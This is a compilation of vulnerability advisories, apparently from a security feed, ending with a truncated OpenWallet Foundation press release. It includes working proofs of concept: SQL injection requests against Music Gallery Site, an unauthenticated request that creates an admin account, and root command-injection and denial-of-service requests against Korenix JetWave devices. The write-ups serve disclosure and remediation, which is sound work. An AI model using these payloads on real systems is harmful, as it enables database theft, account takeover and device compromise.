Music Gallery Site version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Music Gallery Site - SQL Injection on page music_list.php and parameter cid is vulnerable, application url is (?page=music_list&cid=?). >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0938](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0938)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0938) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0938)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> music_list.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: /?page=music_list&cid=*### Description:> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.### Proof of Concept:> Following steps are involved:1. Go to the category menu and click on view category.2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music_list&cid=4*)### Request:```GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220299762-3a0c02cf-364b-49a0-81e5-e7f3f6ed298b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");$sql->bindparam(':id', $cid);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page view_music_details.php and parameter id is vulnerable. >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0961)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0961) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0961)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/view_music_details.php?id=*### Affected Page:> view_music_details.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/view_music_details.php?id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on backend server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on view info of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*)### Request:```GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220317330-519b0112-85fd-4c6f-bf35-446216d73549.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page Master.php and parameter id is vulnerable. > Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0962](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0962)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0962) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0962)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/classes/Master.php?f=get_music_details&id=*### Affected Page:> Master.php> On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on play button of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*)### Request:```GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220339548-20e31f82-cab4-4732-8cf7-8a146c2c1d5b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading

Music Gallery Site 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a missing authentication vulnerability that allows for privilege escalation.

# Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application.

### Date:   
> 21 February 2023

### CVE Assigned:  
**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)

### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Vulnerable URLs:  
> /php-music/classes/Users.php

>/php-music/classes/Master.php

### Affected Page:  
> Users.php , Master.php  
> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.  
### Description:  
> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users  
### Proof of Concept:  
> Following steps are involved:  
1. Send a POST request with required parameter to Users.php?f=save (See Below Request)

2. Request:  
```  
POST /php-music/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 876  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-music/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="firstname"

Test  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="middlename"

Admin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="lastname"

Check  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="username"

testadmin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="password"

test123  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryjwBNagY7zt6cjYHp--

```

3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)

![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png)

![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png)

4. Vulnerable Code Snippets:

Users.php

![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png)

Master.php

![image](https://user-images.githubusercontent.com/123810418/220353132-1067a86c-282d-4fc5-8733-ceab4b1fef56.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack:

Music Gallery Site 1.0 Privilege Escalation / Missing Authentication

Debian Linux Security Advisory 5360-1 - Xi Lu discovered that missing input sanitising in Emacs (in etags, the Ruby mode and htmlfontify) could result in the execution of arbitrary shell commands.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5360-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : emacsCVE ID         : CVE-2022-48337 CVE-2022-48338 CVE-2022-48339Xi Lu discovered that missing input sanitising in Emacs (in etags, theRuby mode and htmlfontify) could result in the execution of arbitraryshell commands.For the stable distribution (bullseye), these problems have been fixed inversion 1:27.1+1-3.1+deb11u2.We recommend that you upgrade your emacs packages.For the detailed security status of emacs please refer toits security tracker page at:https://security-tracker.debian.org/tracker/emacsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP34lMACgkQEMKTtsN8TjZkzg//UZrLYSB1sUOTzzBTq5vTl9rPpE0pKzISJV5xiuSRKr5Et9yK/ekWXEIaC49PH1Bm+xp9t8iN6xZ3KAj4fsss3zaZpi90l1yEQtL3em5aJvK1pY4e7VTrw+0xI0urydKdmxC9POEm5NeDNg2GZ7XM930fa3SzYdmAzt3YRk8KaD10GBU6I27X1xSAa+5B3CNnORPmXKNyLZLVDZpQTqdwqH0bhZzI+TL9kbE6mlUY7xr+BAbmBA/gD57VYtXxCFxDRXyQWGn4EC6w9QVld0kEiVgalsOcljtAbr+WtR813adpd4nUj6zzn8hHstN5ONb9pJ69Zv5OBntBUQm+QexB5nuMGEf4xpXKBPm0I3xOVjnMx1pnijWk8V5iM3ackzbrq0DFz7Zyhwoa3MJmwMuYsfQJgO6iCV+D0ZUMeaJfkrsxXWssgqQeMOx9BGR44TAabl6MaL5ZovhmQdPq+oYiCzphEO1dhdQFdeOn0x9mZWIKFa0ZdIDbVs4OJ0T9iNeUb6BoTTuIma9RkvLVcRNihbhTl0q+0+fks3dq9Rb5NbEsN32s3XutWgsH8JtRS3QkZ2GBywIp1hxyJMxLI9Nv5AOlYMxwchFbYReJvOe2aJQY/8BwBLLKiKmRxNmrjCDCS0ZHcMES35/VCuOkks7g6JDyrgoND6hJg2VjDvOxWTY==4k8C-----END PGP SIGNATURE-----

Debian Security Advisory 5360-1

Debian Linux Security Advisory 5359-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5359-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0927 CVE-2023-0928 CVE-2023-0929 CVE-2023-0930                  CVE-2023-0931 CVE-2023-0932 CVE-2023-0933 CVE-2023-0941Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 110.0.5481.177-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP34kwACgkQEMKTtsN8TjZFwhAAk2JqYKeasa9sMSwiBcpaz+HBtIimsS/ue/TIddRuwcUwpif2qSF+QyL6ac1Wc/jIwW4F7OY9d5Ww8AkvGnxcdzt9dI+g3lPUDByqYJutWahICxm6ZBxrY2ms0NbTYK4hzFBVyobfnQF/EzOGLpyarauFTjBW1sbtCSFnXYeMHd5+rpw5bYTx5JZPoG2fGHuAcXE2CoKGm41tqzegYdKrv33eID3EB91ne/oMqTp4/q1QEVeZiQ0JdRPHq8fJG+FOdPdU3K/eROkkxvakd+QCTcGetKONQ0HFkr43BLP8EAMBAbg4Ds+zaJ+xgenHusSrN+Q7MQraYgqZ6DInzrJXBeeXSu9zm+iwEpJXuerQv3iYDn0o75gzL+qtoh31mePFB6jihIgHo0adqu6upNedFGe+YY1RuJuYWlw2cvjagdaSgotuGbNirXXDYUlQMA82eu+d3yv1hexkbCNQGykGOmuF7J2O+Vwb34Hf6MlDAxrdOuaEcxw8siOsa/MhXKYT1nmxASizffo2mmk/HJatqoTQXtxOWaVIv2Q/ySCc9WsESCRzh1J1gjf8+RH3T/O6T1EfM5oKi4bEZMhcxPhM+ue2DpBxVIB1qPDlOOsqQeLfaBwdcqmeXIl+pZhQBsB9A6okzNfoktEKUysQkKRlTPSl9QCQpd/cdVCwFMfXWA0==4fPc-----END PGP SIGNATURE-----

Debian Security Advisory 5359-1

An issue was discovered in lib60870 v2.3.2. There is a memory leak in lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c.

Hello, there is a memory leak in lib60870/lib60870-C/examples/multi\_client\_server/multi\_client\_server.c:213.

In the directory lib60870/lib60870-C/examples/multi\_client\_server，this pointer newAsdu in multi\_client\_server.c:213 is not freed in the end. It will cause memory leaks.

steps to reproduce:  
I used gcc 9.4 and AddressSanitizer (export **CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"** before **make**) to build lib60870/lib60870-C/examples/multi\_client\_server.  
Run this program multi\_client\_server.  
Press the button Ctrl+C to terminate the program multi\_client\_server.

**ASAN Output**

    $ ./multi_client_server    
    ^C
    =================================================================
    ==11375==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 296 byte(s) in 1 object(s) allocated from:
        #0 0x7fa9a372d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x55956bd32773 in Memory_malloc src/hal/memory/lib_memory.c:33
        #2 0x55956bd25f59 in CS101_ASDU_create src/iec60870/cs101/cs101_asdu.c:90
        #3 0x55956bd1a052 in main /home/saltf1sh/target/lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c:213
        #4 0x7fa9a342f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    
    SUMMARY: AddressSanitizer: 296 byte(s) leaked in 1 allocation(s).

CVE-2023-23205: Memory leaks in multi_client_server.c:213 · Issue #132 · mz-automation/lib60870

Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

CVE-2023-23296: [EN] Multiple Vulnerabilities in Korenix JetWave Series - CyberDanube

Diverse ecosystem of global technology, finance, and university leaders join as first OpenWallet Foundation Members, many more expected.

**BRUSSELS and SAN FRANCISCO, February 23,  2023 --** Linux Foundation Europe, an independent trusted supporter and vendor-neutral home for open source projects in Europe, today announced the official formation of the OpenWallet Foundation (OWF). This new, collaborative effort will develop open source software to support interoperability for a wide range of wallet use cases, including making payments, proving identity, storing validated credentials such as employment, education, financial standing, and entitlements — to enable trust in the digital future. 

Inaugural Premier members sponsoring the OWF include Accenture, Gen, Futurewei and Visa. General members sponsoring the foundation include American Express, Deutsche Telekom / T-Systems, esatus AG, Fynbos, Hopae, IAMX, IDnow, IndyKite, Intesi Group, Ping Identity, SmartMedia Technologies (SMT), Spruce and Swisscom. 

Additionally, 20 leading nonprofits and academic and government entities have joined the foundation, including Customer Commons, Decentralized Identity Foundation (DIF), Digital Identification and Authentication Council of Canada (DIACC), Digital Dollar Project, Digital Identity New Zealand (DINZ), Digital Identity and Data Sovereignty Association (DIDAS), DizmeID Foundation (DIZME), Hyperledger Foundation, Information Technologies ics and Telematics Institute / Centre for Research and Technology Hellas (CERTH/ITI), Johannes Kepler University Linz, ID2020, IDunion SCE, Mifos Initiative, MIT Connection Science, Modular Open Source Identity Platform (MOSIP), OpenID Foundation, Open Identity Exchange (OIX), Secure Identity Alliance (SIA), Universitat Rovira i Virgili, and the Trust Over IP Foundation (ToIP).

The OWF will not publish a wallet itself, nor offer credentials or create new standards. Instead, its open source software engine aims to become the core that other organizations and companies leverage to develop their own digital wallets. The wallets will seek feature parity with the best available wallets and interoperability with major cross-border projects such as the EU’s Digital Identity Wallet.

"Wallets are critical infrastructure for payments, for identity, and for secure access. Open source  — driven by collaboration among for-profits large and small, non-profits, and government leaders — is a great role model for infrastructure that is vital for digital societies and benefits everyone," said Daniel Goldscheider, founder of the OpenWallet Foundation. "With open source at the core of wallets, like it is at the core of web browsers, anyone can build a digital wallet that works with others and gives consumers the freedom to maintain their identity and verifiable credentials and share relevant data when, where, and with whom they choose."

With such a consequential and diverse group of members, OWF underscores how important it is to have an open foundation to support a plurality of digital wallets to ensure consistency, interoperability, and portability while protecting consumer privacy.

"The world needs a place to store digital assets that matter, and the work of this foundation has the potential to redefine the credentials landscape globally, creating in turn much better digital experiences for people everywhere and new market opportunities," said Gabriele Columbro, general manager of Linux Foundation Europe. "The EU has been a leading force in data privacy and consumer protection, and efforts like OWF offer a concrete opportunity for policy makers to 'shift left' their engagement, enabling a continuous and transparent feedback cycle between regulations and regulated technology. That’s why we are honored to bring such a relevant group of cross-industry players together in OWF under Linux Foundation Europe."

The OWF is the second project hosted by Linux Foundation Europe. Project Sylva was added in November 2022 to create an open source telco cloud software framework. 

Launching in tandem with OWF is a new report, Why the World Needs an Open Source Digital Wallet Right Now, from the OWF in partnership with Linux Foundation Research. The report notes:

*   Digital wallets are the world’s leading payment method for e-commerce and  point-of-sale retail. In 2021, the value of digital wallet transactions came to $15.9 trillion. 
